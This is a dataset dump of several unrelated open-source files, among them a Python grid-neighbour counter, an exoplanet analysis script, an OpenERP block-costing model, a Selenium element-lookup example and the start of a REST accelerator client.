blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
15bc005d598cc93623857c43174d7110fd878d93 | 603848284fa946b17783779966fe84ed7bcbf337 | /count_neighbours.py | efd86fb001e51c8dc568ba21e88b03d8c661d14a | [] | no_license | bajun/checkiotasks | 70e0ebc08813f13e536f82d69ab18020da8c5c3a | 29e5fcacfbf7f97c847bbf7827c5caaddae8d274 | refs/heads/master | 2021-01-19T19:35:38.248693 | 2015-01-30T12:18:27 | 2015-01-30T12:18:27 | 30,067,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | def count_neighbours(grid, row, col):
counter = 0
numrows = len(grid)
numcols = len(grid[0])
for i in range(row-1,row+2):
for j in range(col-1,col+2):
if ([i,j] != [row,col]) and i>=0 and j>=0 and i<=numrows-1 and j<=numcols-1:
if ((grid[i][j]==1)):
counter+=1
return counter | [
"srglvk3@gmail.com"
] | srglvk3@gmail.com |
cd258b1c305670326b2579d6c6bf9a0a23e40a00 | 40be3b0e23b27539998f016ac94c87de34d34408 | /hw40.py | 2f966bf4e0dd3233f779de95270faf1e10606ffd | [] | no_license | ChandanaD1/react-native-app | 83e8e0aee9d74329d2338a0a321d8d3d09a506b5 | 6f6ecd4e0462aacbd60b2c400be5b1afe4d14e8c | refs/heads/main | 2023-09-03T21:05:19.685986 | 2021-10-16T03:07:48 | 2021-10-16T03:07:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,136 | py | # interpreting results
import csv
import pandas as pd
import plotly.express as px
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import seaborn as sb

# Load the exoplanet table; the first CSV row is the header, the rest are data.
rows = []
with open("main.csv","r") as f:
    csvreader = csv.reader(f)
    for row in csvreader:
        rows.append(row)

# BUG FIX: the original indexed `row` (the *last* row read by the loop)
# instead of the accumulated `rows` list, so `headers` and `planet_data_rows`
# held cells of the final CSV row rather than the header/data rows.
headers = rows[0]
planet_data_rows = rows[1:]

# Column 3 = mass, column 7 = radius, column 11 = name (all values are
# strings as read from the CSV; converted to float where arithmetic is done).
planet_masses = []
planet_radiuses = []
planet_names = []
for planet_data in planet_data_rows:
    planet_masses.append(planet_data[3])
    planet_radiuses.append(planet_data[7])
    planet_names.append(planet_data[11])

# Surface-gravity proxy per planet (mass scaled by solar mass over radius^2).
# NOTE(review): the denominator constant `.989e+30` looks like a typo of
# `1.989e+30` (solar mass, kg); kept as-is pending confirmation of intent.
planet_gravity = []
for index, value in enumerate(planet_names):
    gravity = (float(planet_masses[index])*1.989e+30) / (float(planet_radiuses[index])*float(planet_radiuses[index])*.989e+30)
    planet_gravity.append(gravity)

# Scatter of radius vs mass, marker size encodes the gravity proxy.
fig = px.scatter(x=planet_radiuses, y=planet_masses, size=planet_gravity, hover_data=[planet_names])
fig.show()

# Build (radius, mass) feature pairs for K-means clustering.
X = []
for index, planet_mass in enumerate(planet_masses):
    temp_list = [
        planet_radiuses[index],
        planet_mass
    ]
    X.append(temp_list)

# Elbow method: within-cluster sum of squares (inertia) for k = 1..10.
wcss = []
for i in range(1, 11):
    kmeans = KMeans(n_clusters=i, init='k-means++', random_state = 42)
    kmeans.fit(X)
    wcss.append(kmeans.inertia_)
plt.figure(figsize=(10,5))
sb.lineplot(range(1, 11), wcss, marker='o', color='red')
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()

# Keep planets whose gravity proxy falls in a roughly Earth-like band.
gravity_planets_range = []
for index, gravity in enumerate(planet_gravity):
    if gravity<300 and gravity>150:
        gravity_planets_range.append(planet_data_rows[index])

# BUG FIX: CSV cells are strings; `planet_data[2] <= 100` compared a str to an
# int (always False on Python 2, TypeError on Python 3). Convert first.
# NOTE(review): column 2 is presumably a distance/period figure — confirm
# against the dataset schema.
suitable_planets = []
for planet_data in gravity_planets_range:
    if float(planet_data[2]) <= 100:
        suitable_planets.append(planet_data)
print(len(suitable_planets))

# Column 8 = distance, used for the last bar chart.
planet_distance = []
for planet_data in planet_data_rows:
    planet_distance.append(planet_data[8])

# BUG FIX: the original passed `planet_mass` (the stale loop variable left
# over from the clustering step, i.e. a single value) instead of the full
# `planet_masses` list to the first bar chart.
graph1 = px.bar(x = planet_names, y = planet_masses)
graph2 = px.bar(x = planet_names, y = planet_radiuses)
graph3 = px.bar(x = planet_names, y = planet_gravity)
graph4 = px.bar(x = planet_names, y = planet_distance)
graph1.show()
graph2.show()
graph3.show()
graph4.show()
| [
"noreply@github.com"
] | ChandanaD1.noreply@github.com |
9ac417944b33f131ee08e9959df0faa36b85555a | 1518039c3d1e139753547562c3cb3241e2b615a1 | /src/doodle_config.py | 2d7f9303d624d3e9f6022984123a6ce4b8af896a | [] | no_license | waymobetta/doodle | cea9956919efb8607ec5c253d8fc068f739cd0e5 | 53b0946f2d175eccc06d9b3d0541f04319bc9d0f | refs/heads/master | 2023-04-29T20:27:10.001110 | 2020-12-16T17:24:51 | 2020-12-16T17:24:51 | 269,188,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | #!/usr/bin/env python3
import os

# Filesystem locations doodle needs at runtime. Every path is injected
# through an environment variable rather than hard-coded; a KeyError here
# means the corresponding variable is unset.
cfg = {
    key: os.environ[env_var]
    for key, env_var in (
        # jrnl CLI sets this: /Users/ZETTLEKASTEN/.config/jrnl/jrnl.yaml
        ('jrnl_config_path', 'JRNL_CONFIG_PATH'),
        # jrnl CLI sets this: /Users/ZETTLEKASTEN/.local/share/jrnl/
        ('jrnl_txt_path', 'JRNL_TXT_PATH'),
        # /Users/ZETTLEKASTEN/jrnl-data/
        ('jrnl_json_path', 'JRNL_JSON_PATH'),
    )
}
| [
"jbroethke@gmail.com"
] | jbroethke@gmail.com |
7205410b8b4aa4eca29cef8453728831c60f9c95 | 895f79e57861f2e2d552750fe56b5f742bdbd4cb | /tcv_block_cost/model/tcv_block_cost.py | 9caeec8a8e99bde1b85ad43139203c8483fd6f97 | [] | no_license | Tecvemar/openerp60 | e9899eebcfa150dd52537db8dcbf7264fafc63cd | 8534c448f63c71e57d91b21656f1bc1aa8f7aea8 | refs/heads/master | 2023-02-15T04:55:05.817013 | 2023-01-26T21:01:35 | 2023-01-26T21:01:35 | 74,976,919 | 1 | 1 | null | 2022-01-21T14:42:29 | 2016-11-28T13:45:07 | Python | UTF-8 | Python | false | false | 23,295 | py | # -*- encoding: utf-8 -*-
##############################################################################
# Company: Tecvemar, c.a.
# Author: Juan Márquez
# Creation Date: 2013-08-26
# Version: 0.0.0.1
#
# Description:
#
#
##############################################################################
#~ from datetime import datetime
from osv import fields, osv
from tools.translate import _
#~ import pooler
import decimal_precision as dp
import time
#~ import netsvc
##-------------------------------------------------------------- tcv_block_cost
class tcv_block_cost(osv.osv):
    """Block costing document (OpenERP 6 model 'tcv.block.cost').

    Spreads the untaxed amount of a transport (freight) supplier invoice
    over the stone blocks it carried, writes the resulting unit cost back
    to each block's production lot, and posts the matching account move.
    """
    _name = 'tcv.block.cost'
    _description = ''
    # Values for the 'type' selection field: how the transport amount is
    # distributed over the block lines.
    _method_types = {'qty': 'By units', 'size': 'By sizes', 'manual': 'Manual'}
    ##-----------------------------------------------------
    def default_get(self, cr, uid, fields, context=None):
        """Prefill the document from the invoice in the client context
        (used when the form is opened from an account.invoice record)."""
        context = context or {}
        data = super(tcv_block_cost, self).\
            default_get(cr, uid, fields, context)
        if context.get('active_model') == u'account.invoice' and \
                context.get('active_id'):
            obj_inv = self.pool.get('account.invoice')
            inv = obj_inv.browse(cr, uid, context.get('active_id'),
                                 context=context)
            data.update(
                {'date': inv.date_document,
                 'invoice_id': inv.id,
                 'supplier_invoice_number': inv.supplier_invoice_number,
                 'partner_id': inv.partner_id.id,
                 'transp_amount': inv.amount_untaxed,
                 'invoice_name': inv.name,
                 'invoice_date': inv.date_document})
        return data
    ##----------------------------------------------------- _internal methods
    def _update_lot_cost(self, cr, uid, ids, context=None):
        """Write each line's computed unit cost (and arrival date) onto the
        corresponding stock.production.lot record."""
        ids = isinstance(ids, (int, long)) and [ids] or ids
        obj_lot = self.pool.get('stock.production.lot')
        for item in self.browse(cr, uid, ids, context={}):
            for block in item.lot_ids:
                obj_lot.write(cr, uid, block.prod_lot_id.id,
                              {'property_cost_price': block.cost_unit,
                               'date': block.date_arrival}, context=context)
    def _gen_account_move_line(self, company_id, partner_id, account_id, name,
                               debit, credit):
        """Build one (0, 0, vals) tuple for an account.move 'line_id'
        one2many command list."""
        return (0, 0, {
            'auto': True,
            'company_id': company_id,
            'partner_id': partner_id,
            'account_id': account_id,
            'name': name,
            'debit': debit,
            'credit': credit,
            'reconcile': False,
        })
    def _gen_account_move(self, cr, uid, ids, context=None):
        """Create and post the account move for each document: one debit
        line per block (stock input account) balanced by one credit line on
        the transport account. Returns the id of the last move created."""
        obj_move = self.pool.get('account.move')
        move_id = None
        for item in self.browse(cr, uid, ids, context={}):
            i = item.invoice_id
            transport_inv = \
                _('\n\t\tNº %s, Supplier: %s, Description: %s, date: %s') % \
                (i.number, i.partner_id.name, i.name, i.date_document)
            period_id = self.pool.get('account.period').\
                find(cr, uid, dt=item.date)
            move = {
                'ref': '%s %s' % (_('Block costing:'), item.name),
                'journal_id': item.journal_id.id,
                'date': item.date,
                'period_id': period_id[0] if period_id else 0,
                'company_id': item.company_id.id,
                'state': 'draft',
                'to_check': False,
                'narration': _('Block costing (%s):\n\n\t' +
                               'Transport invoice: %s\n\n\tBlocks:') %
                (_(self._method_types.get(item.type, '')),
                 transport_inv),
                }
            lines = []
            for line in item.lot_ids:
                line_name = '%s %s' % (line.prod_lot_id.name,
                                       line.product_id.name)
                # Stock input account: product-level first, then the
                # product category's account as fallback.
                line_acc = (
                    line.product_id.property_stock_account_input and
                    line.product_id.property_stock_account_input.id) or \
                    (line.product_id.categ_id.
                     property_stock_account_input_categ and
                     line.product_id.categ_id.
                     property_stock_account_input_categ.id)
                if not line_acc:
                    raise osv.except_osv(
                        _('Error!'),
                        _('Can\'t find the stock input account for %s ' +
                          'product') %
                        (line.product_id.name))
                move.update({'narration': '%s\n\t\t%s' %
                             (move['narration'], line_name)})
                lines.append(self._gen_account_move_line(
                    item.company_id.id, item.partner_id.id,
                    line_acc, '%s %s' % (_('Block costing:'), line_name),
                    line.transp_unit, 0))
            # Single balancing credit line for the whole transport amount.
            lines.append(self._gen_account_move_line(
                item.company_id.id, item.partner_id.id,
                item.account_id.id, move['ref'], 0,
                item.transp_amount))
            lines.reverse()
            move.update({'line_id': lines})
            move_id = obj_move.create(cr, uid, move, context)
            obj_move.post(cr, uid, [move_id], context=context)
            if move_id:
                self.write(cr, uid, item.id, {'move_id': move_id},
                           context=context)
            #~ self.do_reconcile(cr, uid, item, move_id, context)
        return move_id
    ##----------------------------------------------------- function fields
    # ORM field definitions. Most fields are read-only once the record
    # leaves the 'draft' state.
    _columns = {
        'name': fields.char('Ref:', size=64, required=False, readonly=True),
        'date': fields.date('Date', required=True, readonly=True,
                            states={'draft': [('readonly', False)]},
                            select=True,
                            help="The day of block arrival and account move"),
        'invoice_id': fields.many2one('account.invoice', 'Number',
                                      ondelete='restrict', select=True,
                                      required=True, readonly=True,
                                      states={'draft': [('readonly', False)]}),
        'invoice_name': fields.related('invoice_id', 'name', type='char',
                                       string='Description', size=64,
                                       store=False, readonly=True),
        'supplier_invoice_number': fields.related(
            'invoice_id', 'supplier_invoice_number', type='char',
            string='Invoice #', size=64, store=False, readonly=True),
        'partner_id': fields.related('invoice_id', 'partner_id',
                                     type='many2one', relation='res.partner',
                                     string='Supplier', store=False,
                                     readonly=True),
        'invoice_date': fields.related('invoice_id', 'date_document',
                                       type='date', string='Date inv',
                                       store=False, readonly=True),
        'transp_amount': fields.float('Amount', digits_compute=dp.
                                      get_precision('Account'), required=True,
                                      readonly=True,
                                      states={'draft': [('readonly', False)]}),
        'lot_ids': fields.one2many('tcv.block.cost.lots', 'line_id', 'String',
                                   readonly=True,
                                   states={'draft': [('readonly', False)]}),
        'type': fields.selection(
            _method_types.items(), string='Method', required=True,
            readonly=True, states={'draft': [('readonly', False)]},
            help="Method to distribute transportation cost:\n" +
            "by units, by block size (total volume) or manual"),
        'company_id': fields.many2one('res.company', 'Company',
                                      required=True, readonly=True,
                                      ondelete='restrict'),
        'journal_id': fields.many2one('account.journal', 'Journal',
                                      required=True, ondelete='restrict',
                                      readonly=True,
                                      states={'draft': [('readonly', False)]}),
        'account_id': fields.many2one(
            'account.account', 'Transp. account', required=True,
            ondelete='restrict', help="Account for block transport (stock)",
            readonly=True, states={'draft': [('readonly', False)]}),
        'move_id': fields.many2one('account.move', 'Account move',
                                   ondelete='restrict', select=True,
                                   readonly=True,
                                   help="The move of this entry line."),
        'validator': fields.many2one(
            'res.users', 'Approved by', readonly=True, select=True,
            ondelete='restrict'),
        'note': fields.char('Notes', size=128, required=False,
                            readonly=False),
        'prod_lot_id': fields.related('lot_ids', 'prod_lot_id',
                                      type='many2one',
                                      relation='stock.production.lot',
                                      string='Production lot'),
        'state': fields.selection([('draft', 'Draft'), ('done', 'Done'),
                                   ('cancel', 'Cancelled')],
                                  string='State', required=True,
                                  readonly=True),
        }
    _defaults = {
        'name': lambda *a: '/',
        'type': lambda *a: 'qty',
        'state': lambda *a: 'draft',
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company').
        _company_default_get(cr, uid, 'obj_name', context=c),
        'date': lambda *a: time.strftime('%Y-%m-%d'),
        }
    _sql_constraints = [
        ('invoice_id_uniq', 'UNIQUE(invoice_id)',
         'The transport invoice must be unique!'),
        ]
    ##-----------------------------------------------------
    ##----------------------------------------------------- public methods
    ##----------------------------------------------------- buttons (object)
    def compute_block_cost(self, cr, uid, ids, context=None):
        """Distribute the transport amount over the lines.

        'qty': one equal share per group (lines with group == 0 count as a
        group of their own, keyed by lot name); inside a numbered group the
        share is split proportionally to block size. 'size': proportional
        to block size over the total volume. 'manual': lines are left as
        entered by the user.
        """
        ids = isinstance(ids, (int, long)) and [ids] or ids
        obj_lin = self.pool.get('tcv.block.cost.lots')
        roundto = 2
        for item in self.browse(cr, uid, ids, context={}):
            line_ids = map(lambda x: x.id, item.lot_ids)
            if line_ids:
                if item.type == 'qty':
                    #~ count groups
                    groups = {}
                    for block in item.lot_ids:
                        if block.group == 0:
                            groups.update({block.prod_lot_id.name: block})
                        else:
                            if groups.get(block.group):
                                groups[block.group].append(block)
                            else:
                                groups.update({block.group: [block]})
                    transp_unit = round(item.transp_amount /
                                        len(groups), roundto)
                    for g in groups:
                        # int/long keys are numbered groups (lists of
                        # lines); string keys hold a single ungrouped line.
                        if isinstance(g, (int, long)):
                            vol = group_tot = 0
                            for i in groups[g]:
                                vol += i.block_size
                            for i in groups[g]:
                                transp_group = round((transp_unit *
                                                      i.block_size) /
                                                     vol, roundto)
                                obj_lin.write(cr, uid, i.id,
                                              {'transp_unit': transp_group},
                                              context=context)
                                group_tot += transp_group
                        else:
                            obj_lin.write(cr, uid, groups[g].id,
                                          {'transp_unit': transp_unit},
                                          context=context)
                elif item.type == 'size':
                    tot_size = 0
                    for block in item.lot_ids:
                        tot_size += block.block_size
                    for block in item.lot_ids:
                        transp_unit = round((item.transp_amount *
                                             block.block_size) /
                                            tot_size, roundto)
                        obj_lin.write(cr, uid, block.id,
                                      {'transp_unit': transp_unit},
                                      context=context)
                #~ else: ## manual
                    #~ return True
        return True
    ##----------------------------------------------------- on_change...
    def on_change_invoice_id(self, cr, uid, ids, invoice_id):
        """Refresh the invoice-related fields when the invoice changes.

        NOTE(review): `res` is unbound when `invoice_id` is falsy, so the
        final `return res` would raise NameError in that case — confirm the
        client never triggers this onchange with an empty value.
        """
        if invoice_id:
            obj_invl = self.pool.get('account.invoice')
            invl = obj_invl.browse(cr, uid, invoice_id, context=None)
            res = {'value':
                   {'supplier_invoice_number': invl.supplier_invoice_number,
                    'partner_id': invl.partner_id.id,
                    'transp_amount': invl.amount_untaxed,
                    'invoice_name': invl.name,
                    'invoice_date': invl.date_document}}
        return res
    ##----------------------------------------------------- create write unlink
    def create(self, cr, uid, vals, context=None):
        """Assign the next 'tcv.block.cost' sequence number when no explicit
        reference is supplied."""
        if not vals.get('name') or vals.get('name') == '/':
            vals.update({'name': self.pool.get('ir.sequence').
                         get(cr, uid, 'tcv.block.cost')})
        res = super(tcv_block_cost, self).create(cr, uid, vals, context)
        return res
    def unlink(self, cr, uid, ids, context=None):
        """Forbid deletion of documents that are not draft/cancelled.

        NOTE(review): `unlink_ids` is collected but never used — the super
        call deletes the full `ids` list once all records pass the check.
        """
        unlink_ids = []
        for item in self.browse(cr, uid, ids, context={}):
            if item.state in ('draft', 'cancel'):
                unlink_ids.append(item.id)
            else:
                raise osv.except_osv(
                    _('Invalid action !'),
                    _('Cannot delete block costing that are already Done!'))
        res = super(tcv_block_cost, self).unlink(cr, uid, ids, context)
        return res
    ##----------------------------------------------------- Workflow
    def button_draft(self, cr, uid, ids, context=None):
        """Workflow: reset the document to draft."""
        vals = {'state': 'draft'}
        return self.write(cr, uid, ids, vals, context)
    def button_done(self, cr, uid, ids, context=None):
        """Workflow: compute the distribution, push costs to the lots,
        post the account move and mark the document done."""
        self.compute_block_cost(cr, uid, ids, context)
        self._update_lot_cost(cr, uid, ids, context)
        self._gen_account_move(cr, uid, ids, context)
        vals = {'state': 'done', 'validator': uid}
        return self.write(cr, uid, ids, vals, context)
    def button_cancel(self, cr, uid, ids, context=None):
        """Workflow: cancel the document, removing its draft account move
        (if any) and zeroing the cost stored on each production lot."""
        ids = isinstance(ids, (int, long)) and [ids] or ids
        obj_move = self.pool.get('account.move')
        obj_lot = self.pool.get('stock.production.lot')
        for item in self.browse(cr, uid, ids, context={}):
            if item.move_id:
                move = obj_move.browse(cr, uid, item.move_id.id, context=None)
                if move.state == 'draft':
                    self.write(cr, uid, item.id, {'move_id': None},
                               context=context)
                    obj_move.unlink(cr, uid, [move.id])
            # Clear actual block cost
            for block in item.lot_ids:
                obj_lot.write(cr, uid, block.prod_lot_id.id,
                              {'property_cost_price': 0}, context=context)
        vals = {'state': 'cancel', 'validator': None}
        return self.write(cr, uid, ids, vals, context)
    def test_draft(self, cr, uid, ids, *args):
        """Workflow guard: moving back to draft is always allowed."""
        return True
    def test_done(self, cr, uid, ids, *args):
        """Workflow guard: every line must have a block cost and the sum of
        line transport shares must equal the invoice transport amount."""
        ids = isinstance(ids, (int, long)) and [ids] or ids
        for item in self.browse(cr, uid, ids, context={}):
            amount = item.transp_amount
            for line in item.lot_ids:
                if not line.block_amount:
                    raise osv.except_osv(
                        _('Error!'),
                        _('Must indicate a cost for block: %s') %
                        (line.prod_lot_id.name))
                amount -= line.transp_unit
            # Small tolerance absorbs the per-line rounding to 2 decimals.
            if abs(amount) > 0.0001:
                raise osv.except_osv(
                    _('Error!'),
                    _('The transport\'s amount dosen\'t corresponds with sum ' +
                      'of the transport lines'))
        return True
    def test_cancel(self, cr, uid, ids, *args):
        """Workflow guard: refuse cancellation while the generated account
        move is posted."""
        ids = isinstance(ids, (int, long)) and [ids] or ids
        for item in self.browse(cr, uid, ids, context={}):
            if item.move_id and item.move_id.id:
                move = self.pool.get('account.move').\
                    browse(cr, uid, item.move_id.id, context=None)
                if move.state == 'posted':
                    raise osv.except_osv(
                        _('Error!'),
                        _('You can not cancel a block costing while the ' +
                          'account move is posted.'))
        return True
tcv_block_cost()
##--------------------------------------------------------- tcv_block_cost_lots
class tcv_block_cost_lots(osv.osv):
    """One costed block line of a tcv.block.cost document: links a
    production lot to its purchase cost and its transport share, and
    derives the total and per-size unit cost."""
    _name = 'tcv.block.cost.lots'
    _description = ''
    ##-----------------------------------------------------
    ##----------------------------------------------------- _internal methods
    def _compute_all(self, cr, uid, ids, field_name, arg, context=None):
        """Function-field computation for 'cost_total' (block cost +
        transport share) and 'cost_unit' (total divided by block size).
        NOTE(review): divides by block_size — a lot with lot_factor == 0
        would raise ZeroDivisionError; confirm lots always have a size."""
        res = {}
        for item in self.browse(cr, uid, ids, context=context):
            cost_tot = item.block_amount + item.transp_unit
            res[item.id] = {'cost_total': cost_tot,
                            'cost_unit': round(cost_tot / item.block_size, 2),
                            }
        return res
    ##----------------------------------------------------- function fields
    # ORM field definitions for one block line.
    _columns = {
        'line_id': fields.many2one('tcv.block.cost', 'Cost', required=True,
                                   ondelete='cascade'),
        'prod_lot_id': fields.many2one(
            'stock.production.lot', 'Production lot', required=True,
            domain="[('stock_driver', '=', 'block')]"),
        'product_id': fields.related(
            'prod_lot_id', 'product_id',
            type='many2one', relation='product.product', string='Product',
            store=False, readonly=True),
        'block_size': fields.related(
            'prod_lot_id', 'lot_factor',
            type='float', string='Block size', store=False, readonly=True,
            digits_compute=dp.get_precision('Extra UOM data')),
        'block_invoice_id': fields.many2one(
            'account.invoice', 'Block inv.',
            ondelete='restrict', select=True, required=False),
        'block_amount': fields.float(
            'Block cost', digits_compute=dp.get_precision('Account')),
        'transp_unit': fields.float(
            'Transportation', digits_compute=dp.get_precision('Account')),
        'cost_total': fields.function(
            _compute_all, method=True, type='float', string='Total amount',
            digits_compute=dp.get_precision('Account'), multi='all'),
        'cost_unit': fields.function(
            _compute_all, method=True, type='float', string='Unit cost',
            digits_compute=dp.get_precision('Account'), multi='all'),
        'waybill': fields.char(
            'Waybill', size=32, required=False, readonly=False),
        'group': fields.integer(
            'Group transport', required=True,
            help="Indicate 0 for no group or any nro to indicate " +
            "the \"group\" of blocks transported"),
        'note': fields.char(
            'Notas', size=128, required=False, readonly=False),
        'date_arrival': fields.date(
            'Date arrival', required=True, readonly=True, select=True,
            states={'draft': [('readonly', False)]},
            help="Date of block arrival"),
        'move_ids': fields.related(
            'prod_lot_id', 'move_ids', type='one2many', relation='stock.move',
            string='Moves for this lot', store=False, readonly=True),
        }
    _defaults = {
        'group': 0,
        }
    _sql_constraints = [
        ('block_amount_gt_zero', 'CHECK(block_amount>=0)',
         'The block cost quantity must be >= 0!'),
        ('transp_unit_gt_zero', 'CHECK(transp_unit>=0)',
         'The transportation cost quantity must be >= 0!'),
        ('prod_lot_id_uniq', 'UNIQUE(prod_lot_id)',
         'The block must be unique!'),
        ]
    ##-----------------------------------------------------
    ##----------------------------------------------------- public methods
    ##----------------------------------------------------- buttons (object)
    def button_set_block_cost(self, cr, uid, ids, context=None):
        """Manually push this line's unit cost onto its production lot
        (only when lot, block cost and transport share are all set)."""
        ids = isinstance(ids, (int, long)) and [ids] or ids
        obj_lot = self.pool.get('stock.production.lot')
        for item in self.browse(cr, uid, ids, context={}):
            if item.prod_lot_id and item.block_amount and item.transp_unit:
                obj_lot.write(cr, uid, item.prod_lot_id.id,
                              {'property_cost_price': item.cost_unit},
                              context=context)
        return True
    ##----------------------------------------------------- on_change...
    def on_change_prod_lot_id(self, cr, uid, ids, prod_lot_id):
        """When the lot changes, refresh product/size and, if exactly one
        invoice line references the lot, prefill the block invoice and its
        untaxed amount."""
        res = {}
        if prod_lot_id:
            obj_invl = self.pool.get('account.invoice.line')
            obj_lot = self.pool.get('stock.production.lot')
            lot = obj_lot.browse(cr, uid, prod_lot_id, context=None)
            res = {'value': {'product_id': lot.product_id.id,
                             'block_size': lot.lot_factor,
                             }}
            invl_id = obj_invl.search(cr, uid,
                                      [('prod_lot_id', '=', prod_lot_id)])
            if invl_id and len(invl_id) == 1:
                invl = obj_invl.browse(cr, uid, invl_id[0], context=None)
                res['value'].update({'block_invoice_id': invl.invoice_id.id,
                                     'block_amount': invl.price_subtotal})
        return res
    def on_change_amount(self, cr, uid, ids, block_amount, transp_unit,
                         block_size):
        """Recompute the displayed total and unit cost client-side when any
        amount changes (mirrors _compute_all)."""
        res = {}
        if block_amount and transp_unit and block_size:
            cost_tot = block_amount + transp_unit
            data = {'cost_total': cost_tot,
                    'cost_unit': round(cost_tot / block_size, 2)}
            res = {'value': data}
        return res
    ##----------------------------------------------------- create write unlink
    ##----------------------------------------------------- Workflow
tcv_block_cost_lots()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"g8787@hotmail.com"
] | g8787@hotmail.com |
ca84176dcc4543867190893bc2a6e3aca04b239d | 107941a50c3adc621563fe0254fd407ea38d752e | /spider_01.py | 32d42c2a2ca6ef3b58162d8cb4c81ff8efba1721 | [] | no_license | zhangliang852469/spider_ | 758a4820f8bd25ef6ad0edbd5a4efbaaa410ae08 | 718208c4d8e6752bbe8d66a209e6d7446c81d139 | refs/heads/master | 2020-04-05T07:12:03.790358 | 2018-11-08T07:17:22 | 2018-11-08T07:17:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,409 | py | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""Locating page nodes with Selenium -- example using taobao.com."""
"""
find_element_by_id
find_element_by_name
find_element_by_xpath
find_element_by_link_text
find_element_by_partial_link_text
find_element_by_tag_name
find_element_by_class_name
find_element_by_css_selector
"""
from selenium import webdriver
# First, initialise and launch the browser
browser = webdriver.Chrome()
# Open the target page
browser.get('https://www.taobao.com')
# Nodes can be looked up by ID, CSS selector, XPath or name
input_first = browser.find_element_by_id('q')
input_second = browser.find_element_by_css_selector('#q')
input_third = browser.find_element_by_xpath('//*[@id="q"]')
input_fouth = browser.find_element_by_name('q')
# Print the lookup results
print(input_first, '\n', input_second,'\n', input_third,'\n', input_fouth)
browser.close()
# Selenium also provides a generic find_element() method. It takes two
# arguments: the lookup strategy (By) and its value. It is the generic form
# of the find_element_by_* helpers: find_element_by_id(id) is equivalent to
# find_element(By.ID, id), and both return exactly the same result.
# from selenium import webdriver
# from selenium.webdriver.common.by import By
#
# browser = webdriver.Chrome()
# browser.get('https://www.taobao.com')
# input_first = browser.find_element(By.ID, 'q')
# print(input_first)
# browser.close()
| [
"710567585@qq.com"
] | 710567585@qq.com |
33c240d56a41129cdf2b4c55802ff56ea5f5c10e | 986f26587e48784a11746c6298000af8e07dd1b7 | /apyfal/client/rest.py | 4a58ea30f6f1ae1fab1a8d268f7239df28d22e56 | [
"Apache-2.0"
] | permissive | JGoutin/apyfal | 118e55c4e31de1e67d068ef937ebddac001ab8d9 | 22dfe791e0956d3d3353daeba0c7a21dfe2f9b77 | refs/heads/master | 2020-12-09T01:03:43.049473 | 2020-01-10T09:57:58 | 2020-01-10T09:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,766 | py | # coding=utf-8
"""Accelerator REST client.
This client allows remote accelerator control."""
import json as _json
import os.path as _os_path
import shutil as _shutil
from uuid import uuid4 as _uuid
from requests.exceptions import HTTPError as _HTTPError
from requests_toolbelt.multipart.encoder import (
MultipartEncoder as _MultipartEncoder)
from apyfal import __version__ as _apyfal_version
import apyfal._utilities as _utl
import apyfal.exceptions as _exc
import apyfal.configuration as _cfg
from apyfal.client import AcceleratorClient as _Client
from apyfal.storage import copy as _srg_copy
class RESTClient(_Client):
"""
Remote Accelerator OpenAPI REST client.
Args:
accelerator (str): Name of the accelerator to initialize.
accelize_client_id (str): Accelize Client ID.
accelize_secret_id (str): Accelize Secret ID.
host_ip (str): IP or URL address of the accelerator host.
ssl_cert_crt (path-like object or file-like object or bool):
Public ".crt" key file of the SSL ssl_cert_key used by host to
provides HTTPS. If provided, the ssl_cert_key is verified on each
request. If not provided, search for a generated certificate.
If False, disable HTTPS.
config (apyfal.configuration.Configuration, path-like object or file-like object):
If not set, will search it in current working directory,
in current user "home" folder. If none found, will use default
configuration values.
Path-like object can be path, URL or cloud object URL.
"""
#: Client type
NAME = 'REST'
# Client is remote or not
REMOTE = True
# REST API routes
_REST_API = {
'process': '/v1.0/process/',
'start': '/v1.0/configuration/',
'stop': '/v1.0/stop/'}
# Number of retries for a request
_REQUEST_RETRIES = 3
def __init__(self, accelerator=None, host_ip=None, ssl_cert_crt=None,
*args, **kwargs):
# Initialize client
_Client.__init__(self, accelerator=accelerator, *args, **kwargs)
# Initializes HTTP client
self._ssl_cert_crt = ssl_cert_crt
self._endpoints = {}
# Mandatory parameters
if not accelerator:
raise _exc.ClientConfigurationException(
"'accelerator' argument is mandatory.")
# Pass host URL if already defined.
if host_ip:
self.url = host_ip
@property
@_utl.memoizedmethod
def _session(self):
"""
Requests session
Returns:
requests.sessions.Session: Session
"""
session_kwargs = dict(max_retries=self._REQUEST_RETRIES)
# Gets SSL certificate
if self._ssl_cert_crt is None and _os_path.exists(_cfg.APYFAL_CERT_CRT):
# Uses default certificate if not provided and not not False
self._ssl_cert_crt = _cfg.APYFAL_CERT_CRT
elif (self._ssl_cert_crt and (hasattr(self._ssl_cert_crt, 'read') or
not _os_path.exists(self._ssl_cert_crt))):
# Copies certificate locally if not reachable by local path
ssl_cert_crt = _os_path.join(self._tmp_dir, str(_uuid()))
_srg_copy(self._ssl_cert_crt, ssl_cert_crt)
self._ssl_cert_crt = ssl_cert_crt
# Enables certificates verification
if self._ssl_cert_crt:
